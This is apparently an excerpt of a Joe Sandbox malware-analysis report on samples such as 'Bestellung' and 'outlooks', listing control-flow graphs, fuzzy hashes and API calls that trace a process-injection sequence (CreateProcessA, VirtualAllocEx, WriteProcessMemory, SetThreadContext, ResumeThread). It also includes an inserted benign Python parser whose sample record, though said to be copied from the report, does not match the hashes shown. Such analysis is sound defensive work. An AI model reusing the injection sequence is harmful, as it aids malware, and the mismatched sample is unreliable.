                                                                            • 114: 16d681e-16d6824 → 115
                                                                            • 115: 16d6825-16d6842
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: af34765ef1ee23cc716540e605a254b5488b2fef1a87152546dc56caef00c0cc
                                                                            • Instruction ID: a76aafbf3978484491fc6aac1a68639f5ba9858c1c579f344161e8859fa30b50
                                                                            • Opcode Fuzzy Hash: af34765ef1ee23cc716540e605a254b5488b2fef1a87152546dc56caef00c0cc
                                                                            • Instruction Fuzzy Hash: 7821B5B5D002489FDB10CF9AD884ADEBBF9FB48310F15841AE954A7350D378A954CFA5

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16d6780 (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 118: 16d6780-16d6781 → 119, 120
                                                                            • 119: 16d67f8-16d681c, calls DuplicateHandle → 121, 122
                                                                            • 120: 16d6783-16d67f5 → 119
                                                                            • 121: 16d681e-16d6824 → 122
                                                                            • 122: 16d6825-16d6842
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: acd0fa2d72248480fdbc05f4ee7eb2aadbbe40fe87d7069b685255e316c48c72
                                                                            • Instruction ID: d7cf47cba5e01e706786b97354d7657c94c63a1c28de7aa443d6c5dcb6d5da7e
                                                                            • Opcode Fuzzy Hash: acd0fa2d72248480fdbc05f4ee7eb2aadbbe40fe87d7069b685255e316c48c72
                                                                            • Instruction Fuzzy Hash: 6721E6B5D002489FDB10CF9AD884ADEBBF9FB48310F14841AE914A3350D378A940CF65

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 16daf60 (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 126: 16daf60-16dc230 → 129, 130
                                                                            • 129: 16dc238-16dc263, calls GetModuleHandleW → 131, 132
                                                                            • 130: 16dc232-16dc235 → 129
                                                                            • 131: 16dc26c-16dc280
                                                                            • 132: 16dc265-16dc26b → 131
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016DC01C), ref: 016DC256
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
                                                                            • Instruction ID: 3ff3505ae0b96708bafaaac1d30a8b14d4e40fda4f495457986d923405ca202c
                                                                            • Opcode Fuzzy Hash: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
                                                                            • Instruction Fuzzy Hash: D11102B5C046498FDB14DF9AC844BDEFBF5EB88210F10852ED519B7210C379A545CFA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493071459.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_168d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1f79183a022a5757264f36f4bb18e1eb474f5c7d33228ae25cfcb616bff2b76
                                                                            • Instruction ID: 521abaf5916a13d1af973c5adc213ffc0e3f016f4a841b039d0362ad4a6e1482
                                                                            • Opcode Fuzzy Hash: d1f79183a022a5757264f36f4bb18e1eb474f5c7d33228ae25cfcb616bff2b76
                                                                            • Instruction Fuzzy Hash: FD210071604304EFDB15EF94DC80B16BB61FB84214F20C669D84A4B382C33AD447CA72
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.1493071459.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_168d000_Bestellung - 021224 - 901003637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bdaa25ecae29b0de6f5768097877fa5ef9b42ecdb68d2ad0b8292cee892f2d3a
                                                                            • Instruction ID: 4e5ce21dac4ff27a1f6eb6748ccd4a4943bec9288eeba0cdc9e4ec6bfd364b77
                                                                            • Opcode Fuzzy Hash: bdaa25ecae29b0de6f5768097877fa5ef9b42ecdb68d2ad0b8292cee892f2d3a
                                                                            • Instruction Fuzzy Hash: 7321D1755083808FCB03CF64C990B05BF71EB46214F28C2DAD8498B2A3C33AD40BCB62
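                                                                            The function records in this listing all share one layout: an optional APIs line, then Memory Dump Source, Source File, Snapshot File, API ID, Opcode ID, Instruction ID and the two fuzzy hashes. The parser below is an added example, not part of the Joe Sandbox report or its tooling; it turns such records into structured entries and groups them by process and dump base address, so the Windows APIs referenced from each non-PE-backed region can be read off at a glance. Its input is three records copied from this section. The process number and base address decoded from the Source File name are confirmed by the page itself (00000009.00000002...016D0000 pairs with hcaresult_9_2_16d0000, 0000000A with hcaresult_10_2_4b60000); reading the fifth dotted field (00000040) as the Win32 page protection PAGE_EXECUTE_READWRITE is an assumption, labelled as such in the code.

```python
"""Parse Joe Sandbox function records ('Memory Dump Source' blocks) and summarise
which Windows APIs each dumped memory region references. Added example, not Joe Sandbox tooling."""
import re

# Constructed input: three records copied from this section of the report.
SAMPLE = """\
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
Memory Dump Source
• Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
• Instruction ID: f9ec3ff060cc9b59e8227ad773d21cf20eea915c817cb5044707a20b38a8c704
• Opcode Fuzzy Hash: c6d4ebaffe30ce920facd3a747ecf9d9efa3bde8d0cc4fd3365b22c70758582e
• Instruction Fuzzy Hash: C0414876900249AFCF11CF99D844ADEBFFAFB48320F15802AE914A7311D739A911DFA0
APIs
• GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016DC01C), ref: 016DC256
Memory Dump Source
• Source File: 00000009.00000002.1493785535.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_16d0000_Bestellung - 021224 - 901003637.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
• Instruction ID: 3ff3505ae0b96708bafaaac1d30a8b14d4e40fda4f495457986d923405ca202c
• Opcode Fuzzy Hash: 4f3a13439936c233a61a39ed138d3f3054b468b7819b8f870b77ceb7fca3556e
• Instruction Fuzzy Hash: D11102B5C046498FDB14DF9AC844BDEFBF5EB88210F10852ED519B7210C379A545CFA5
APIs
• CreateActCtxA.KERNEL32(?), ref: 04B68EF1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
Similarity
• API ID: Create
• String ID: NvY
• API String ID: 2289755597-808744227
• Opcode ID: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
• Instruction ID: 4e6c774d58a11ec5d3132d3fb552a166e3f242ffcd182b638b79d240d980bb47
• Opcode Fuzzy Hash: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
• Instruction Fuzzy Hash: 4741E1B0C00718CFDB24DFA9D844BDEBBB2BF49714F20846AD409AB250DB756946CF91
"""

BULLET = "• "
API_REF = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
# Source File name: <pid>.<stage>.<dump>.<base>.<prot>.<...>.sdmp; pid and base are confirmed by the
# page (hcaresult_9_2_16d0000 pairs with 00000009.00000002...016D0000); treating the fifth field
# as a Win32 page-protection value is an assumption.
SOURCE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.\d+\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
                    r"\.\S+\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
PAGE_EXECUTE_READWRITE = 0x40   # Win32 constant; its applicability here is the assumption above


def parse_records(text):
    """Return one dict per function record; a record closes at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(BULLET):
            continue                                  # section labels carry no data
        body = line[len(BULLET):]
        if m := API_REF.match(body):                  # '• DuplicateHandle.KERNELBASE(...), ref: ...'
            cur["apis"].append((m[1], m[2], m[4]))    # (api, module, call-site address)
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            s = SOURCE.match(value)
            if not s or int(s[5], 16) != int(s[3], 16):   # Offset must agree with the file name
                raise ValueError(f"unrecognised Source File: {value}")
            cur.update(pid=int(s[1], 16), base=int(s[3], 16),
                       protection=int(s[4], 16), pe_backed=s[6] == "true")
        else:
            cur[key.lower().replace(" ", "_")] = value   # e.g. 'API ID' -> cur['api_id']
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = {"apis": []}
    return records


def summarize(records):
    """Group by (process, base address); collect referenced APIs and region flags."""
    regions = {}
    for r in records:
        reg = regions.setdefault((r["pid"], r["base"]), {
            "functions": 0, "apis": set(), "pe_backed": r["pe_backed"],
            "rwx": r["protection"] == PAGE_EXECUTE_READWRITE})   # assumption, see above
        reg["functions"] += 1
        reg["apis"].update(api for api, _, _ in r["apis"])
    return {k: {**v, "apis": sorted(v["apis"])} for k, v in regions.items()}


if __name__ == "__main__":
    for (pid, base), v in sorted(summarize(parse_records(SAMPLE)).items()):
        print(f"process {pid} @ {base:08X}: {v['functions']} function(s); APIs: "
              f"{', '.join(v['apis'])}; PE-backed: {v['pe_backed']}; RWX: {v['rwx']}")
```

                                                                            Run over the three sample records, the summary reports process 9's dump at 016D0000 referencing DuplicateHandle and GetModuleHandleW and process 10's dump at 04B60000 referencing CreateActCtxA, all in regions the report marks as not PE-backed. Feeding the whole listing through parse_records gives the same per-region view for every dump in the report, which is the quickest way to see which injected or unpacked regions touch which APIs.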

                                                                            Execution Graph

                                                                            Execution Coverage:13.5%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:18
                                                                            Total number of Limit Nodes:2
                                                                            execution_graph (drawn as an interactive graph in the report; the raw node/edge dump is not reproduced here). Windows APIs reached from the graphed code in this dump: CreateActCtxA, GetModuleHandleW.

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 4b68e34 (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 0: 4b68e34-4b68f01, calls CreateActCtxA → 2, 3
                                                                            • 2: 4b68f03-4b68f09 → 3
                                                                            • 3: 4b68f0a-4b68f64 → 10, 11
                                                                            • 10: 4b68f66-4b68f69
                                                                            • 11: 4b68f73-4b68f77 → 12, 13
                                                                            • 12: 4b68f88 → 15
                                                                            • 13: 4b68f79-4b68f85 → 12
                                                                            • 15: 4b68f89 → 15 (self-loop)
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 04B68EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: NvY
                                                                            • API String ID: 2289755597-808744227
                                                                            • Opcode ID: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
                                                                            • Instruction ID: 4e6c774d58a11ec5d3132d3fb552a166e3f242ffcd182b638b79d240d980bb47
                                                                            • Opcode Fuzzy Hash: ad20ce20db0826db25122bc596a38951f7be49d0410a247a2023088488bec84d
                                                                            • Instruction Fuzzy Hash: 4741E1B0C00718CFDB24DFA9D844BDEBBB2BF49714F20846AD409AB250DB756946CF91

                                                                            Control-flow Graph

                                                                            Control-flow graph of the function at 4b679dc (drawn as an image in the report; the executed/not-executed colouring is not preserved in text). Basic blocks and successor edges:
                                                                            • 16: 4b679dc-4b68f01, calls CreateActCtxA → 19, 20
                                                                            • 19: 4b68f03-4b68f09 → 20
                                                                            • 20: 4b68f0a-4b68f64 → 27, 28
                                                                            • 27: 4b68f66-4b68f69
                                                                            • 28: 4b68f73-4b68f77 → 29, 30
                                                                            • 29: 4b68f88 → 32
                                                                            • 30: 4b68f79-4b68f85 → 29
                                                                            • 32: 4b68f89 → 32 (self-loop)
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 04B68EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: NvY
                                                                            • API String ID: 2289755597-808744227
                                                                            • Opcode ID: 537894e6c8d9fe79769bfd1754dd3e0f194648f035ae55d81896399376608d35
                                                                            • Instruction ID: 1c654c3ba82a5e5966725f8b0f6b2d95577a02ab3b50e98f1537d56cb02d747e
                                                                            • Opcode Fuzzy Hash: 537894e6c8d9fe79769bfd1754dd3e0f194648f035ae55d81896399376608d35
                                                                            • Instruction Fuzzy Hash: 1541F2B0C00718CFDB24DFA9C844B9EBBF2BF88704F20846AD409AB250DB756946CF90

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 04B6EC3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1744646065.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_4b60000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: NvY
                                                                            • API String ID: 4139908857-808744227
                                                                            • Opcode ID: 746d960d18bfcd7db6cdf6b395bd0008cba40328773aa7fe063024aadadd801f
                                                                            • Instruction ID: a0d8c56054da56bf6f573256d29b8e23868901924b4df44898826f54c3eca710
                                                                            • Opcode Fuzzy Hash: 746d960d18bfcd7db6cdf6b395bd0008cba40328773aa7fe063024aadadd801f
                                                                            • Instruction Fuzzy Hash: A31110B6C006498FDB20CF9AD844BDEFBF4EB88320F10845AD429A7200D379A545CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1678166043.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_abd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ffa75dea82e247a18f1509550da901237b9676dfd9fd1bd072ebd659e6482f2a
                                                                            • Instruction ID: 173f68509a468054572f4ace5d0f685df1b45c795bca38ae19a1b3770d0cc17a
                                                                            • Opcode Fuzzy Hash: ffa75dea82e247a18f1509550da901237b9676dfd9fd1bd072ebd659e6482f2a
                                                                            • Instruction Fuzzy Hash: 25212271604340EFDB14EF10D8C0B56BB69FB88314F20C569D80A0B287D33AD807CA62
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.1678166043.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_abd000_eNuXmIwkixzW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction ID: de245cd2c4acf8431d8fe4adef245de40ac9e127b48ec927564b56edb27168e3
                                                                            • Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction Fuzzy Hash: 0E11BB75504280CFCB11DF10D5C4B15BFA2FB84318F28C6AAD84A4B656C33AD84ACBA2

                                                                            Execution Graph

                                                                            Execution Coverage:15.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:169
                                                                            Total number of Limit Nodes:5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0893B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 4d3de507bf32e2a99f322765417f7ba55b9144f8c5fdcf98dc3c42be4f1974e6
                                                                            • Instruction ID: ad1b2edf8d1c998fbf3c0d93a017b0e1a8e4b4b4317ead6b6aae0633431fa379
                                                                            • Opcode Fuzzy Hash: 4d3de507bf32e2a99f322765417f7ba55b9144f8c5fdcf98dc3c42be4f1974e6
                                                                            • Instruction Fuzzy Hash: CAA14C71D00329CFEB20DF68C8417EEBBB2BF48725F1485A9E809A7240DB749985CF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0893B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 04b75617347273cadca16b7cd289c28bbdf830cdcb13cb815a085bc2248b6db9
                                                                            • Instruction ID: 1eb605b2d548d836d46fd244cdc69ae13baa9fa3ba28f2049ac9aed30c401d94
                                                                            • Opcode Fuzzy Hash: 04b75617347273cadca16b7cd289c28bbdf830cdcb13cb815a085bc2248b6db9
                                                                            • Instruction Fuzzy Hash: CD914B71D00329CFEB20DF68C8417EEBBB6BF48725F1485A9E809A7240DB749985CF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 03218EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 32bea05ed6983c17be85602544bd387a8f3f38c6a0a0f008b044d124afc025a7
                                                                            • Instruction ID: b1cacd81f3bd293087b85366aa447860d5df9359a4efd7d75097b1db7d2b2f21
                                                                            • Opcode Fuzzy Hash: 32bea05ed6983c17be85602544bd387a8f3f38c6a0a0f008b044d124afc025a7
                                                                            • Instruction Fuzzy Hash: B641BFB1C00719CFDB24CFA9C884B9DBBF6BF49704F24805AD408AB251DB755946CF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 03218EF1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 153fc30a9c1d78475f3bd55ef8b52e6475863bf9ff94bcdb38c76d0310dd07ee
                                                                            • Instruction ID: 51f07c1559c0dfe9bd4ef4ef3bf4070ae0c573687f1974b3563fea8afbe52966
                                                                            • Opcode Fuzzy Hash: 153fc30a9c1d78475f3bd55ef8b52e6475863bf9ff94bcdb38c76d0310dd07ee
                                                                            • Instruction Fuzzy Hash: 7641C0B0C10719CFDB24CFA9C984B8EBBF6BF49704F24806AD408AB251DB756946CF91

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0893B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 32a5e651f5a43813749a04f57de7ab0cd1c89b04ff4d52ccaa01f6986681874e
                                                                            • Instruction ID: e649f3b82ac37e9048bc4f91d0de42cd4f8d5ff52e5e3c4d8e7fa1b5fec77e44
                                                                            • Opcode Fuzzy Hash: 32a5e651f5a43813749a04f57de7ab0cd1c89b04ff4d52ccaa01f6986681874e
                                                                            • Instruction Fuzzy Hash: 8C2166719003599FCF10DFAAC881BDEBBF5FF48320F50882AE919A7240D7789944CBA1

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0893B268
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 610bd758d0488dfe3d2aeb3ebdeb4bb5f7727aba7db9f11ca7ec35d820186a5e
                                                                            • Instruction ID: ccee0e42a665e4fe44b5d433cdb13be8d6c92d177e86749175fd4e94236d7caf
                                                                            • Opcode Fuzzy Hash: 610bd758d0488dfe3d2aeb3ebdeb4bb5f7727aba7db9f11ca7ec35d820186a5e
                                                                            • Instruction Fuzzy Hash: 542125719003599FDB10DFAAC885BDEBBF5FF48320F50882AE919A7240D7799940CBA4

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0893ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0

                                                                            Control-flow Graph

                                                                            • Nodes: 179 893b2c1-893b355 (ReadProcessMemory); 183 893b357-893b35d; 184 893b35e-893b38e
                                                                            • Edges: 179->183, 179->184, 183->184
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0893B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0

                                                                            Control-flow Graph

                                                                            • Nodes: 188 893b100-893b193 (VirtualAllocEx); 191 893b195-893b19b; 192 893b19c-893b1c1
                                                                            • Edges: 188->191, 188->192, 191->192
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0893B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0

                                                                            Control-flow Graph

                                                                            • Nodes: 196 893ac38-893ac83; 198 893ac93-893acc3 (Wow64SetThreadContext); 199 893ac85-893ac91; 201 893acc5-893accb; 202 893accc-893acfc
                                                                            • Edges: 196->198, 196->199, 198->201, 198->202, 199->198, 201->202
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0893ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0

                                                                            Control-flow Graph

                                                                            • Nodes: 206 893b2c8-893b355 (ReadProcessMemory); 209 893b357-893b35d; 210 893b35e-893b38e
                                                                            • Edges: 206->209, 206->210, 209->210
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0893B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0

                                                                            Control-flow Graph

                                                                            • Nodes: 214 893ab80-893abf7 (ResumeThread); 218 893ac00-893ac25; 219 893abf9-893abff
                                                                            • Edges: 214->218, 214->219, 219->218
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0

                                                                            Control-flow Graph

                                                                            • Nodes: 223 893b118-893b193 (VirtualAllocEx); 226 893b195-893b19b; 227 893b19c-893b1c1
                                                                            • Edges: 223->226, 223->227, 226->227
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0893B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0

                                                                            Control-flow Graph

                                                                            • Nodes: 231 893ab88-893abf7 (ResumeThread); 234 893ac00-893ac25; 235 893abf9-893abff
                                                                            • Edges: 231->234, 231->235, 235->234
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
